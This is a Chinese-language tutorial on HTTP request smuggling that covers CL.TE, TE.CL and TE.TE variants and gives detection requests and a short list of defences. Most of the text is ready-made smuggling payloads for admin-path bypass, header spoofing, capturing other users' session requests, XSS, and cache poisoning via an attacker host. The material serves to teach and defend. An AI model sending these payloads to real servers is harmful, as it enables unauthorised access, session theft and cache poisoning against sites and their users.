请求走私利用实践一篇通
字数 951 2025-08-19 12:42:28
HTTP请求走私攻击全面指南
1. HTTP请求走私概述
HTTP请求走私是一种干扰网站处理HTTP请求序列的技术,允许攻击者绕过安全控制、获取敏感数据并危害其他用户。这种攻击主要发生在前端服务器和后端服务器对客户端传入数据理解不一致的情况下。
1.1 基本原理
HTTP规范提供了两种指定请求结束位置的方法:
- Content-Length:指示请求或响应消息体的长度(字节)
- Transfer-Encoding:指定消息正文使用分块编码
当这两种方法同时存在且服务器处理不一致时,就会产生请求走私漏洞。
1.2 相关协议特性
- 管道(Pipeline):允许在单个TCP连接上发送多个HTTP请求而无需等待响应
- 持久连接(Keep-Alive):允许在单个TCP连接上发送多个HTTP请求和响应
2. 请求走私类型
2.1 CL.TE漏洞
前端使用Content-Length头,后端使用Transfer-Encoding头
攻击示例:
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked
0
SMUGGLED
2.2 TE.CL漏洞
前端使用Transfer-Encoding头,后端使用Content-Length头
攻击示例:
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked
8
SMUGGLED
0
2.3 TE.TE漏洞
前后端都支持Transfer-Encoding头,但可通过混淆标头诱导其中一方不处理
混淆方法示例:
Transfer-Encoding: xchunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[tab]chunked[space]
Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
3. 检测方法
3.1 时间差异检测
CL.TE检测:
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 4
1
A
X
TE.CL检测:
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 6
0
X
3.2 响应差异检测
CL.TE检测:
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Transfer-Encoding: chunked
e
q=smuggling&x=0
GET /404 HTTP/1.1
Foo: x
TE.CL检测:
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
x=0
4. 利用场景
4.1 绕过前端限制
示例:
POST /home HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: vulnerable-website.com
Foo: xGET /home HTTP/1.1
Host: vulnerable-website.com
4.2 请求重写利用
检测重写方法:
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 130
Transfer-Encoding: chunked
0
POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
email=POST /login HTTP/1.1
Host: vulnerable-website.com
4.3 客户端认证绕过
示例:
POST /example HTTP/1.1
Host: vulnerable-website.com
Content-Type: x-www-form-urlencoded
Content-Length: 64
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
X-SSL-CLIENT-CN: administrator
Foo: x
4.4 越权操作
捕获用户请求:
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 330
0
POST /post/comment HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 400
Cookie: session=BOe1lFDosZ9lk7NLUpWcG8mjiwbeNZAO
csrf=SmsWiwIJ07Wg5oqX87FfUVkMThn9VzO0&postId=2&name=Carlos+Montoya&email=carlos%40normal-user.net&website=https%3A%2F%2Fnormal-user.net&comment=
4.5 反射XSS利用
示例:
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 63
Transfer-Encoding: chunked
0
GET / HTTP/1.1
User-Agent: <script>alert(1)</script>
Foo: X
4.6 重定向攻击
示例:
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 54
Transfer-Encoding: chunked
0
GET /home HTTP/1.1
Host: attacker-website.com
Foo: X
4.7 缓存投毒
示例:
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 59
Transfer-Encoding: chunked
0
GET /home HTTP/1.1
Host: attacker-website.com
Foo: XGET /static/include.js HTTP/1.1
Host: vulnerable-website.com
4.8 缓存欺骗
示例:
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 43
Transfer-Encoding: chunked
0
GET /private/messages HTTP/1.1
Foo: X
5. 防御措施
- 禁用前端服务器到后端服务器的连接重用
- 使用HTTP/2端到端并禁用HTTP降级
- 前端服务器标准化不明确的请求
- 后端服务器拒绝不明确的请求并关闭连接
- 对所有应用层消息使用严格相同的web服务器软件
6. 总结
HTTP请求走私攻击利用服务器对HTTP请求处理的不一致性,可以导致多种安全风险。防御的关键在于确保前后端服务器对请求处理的一致性,并实施严格的请求验证机制。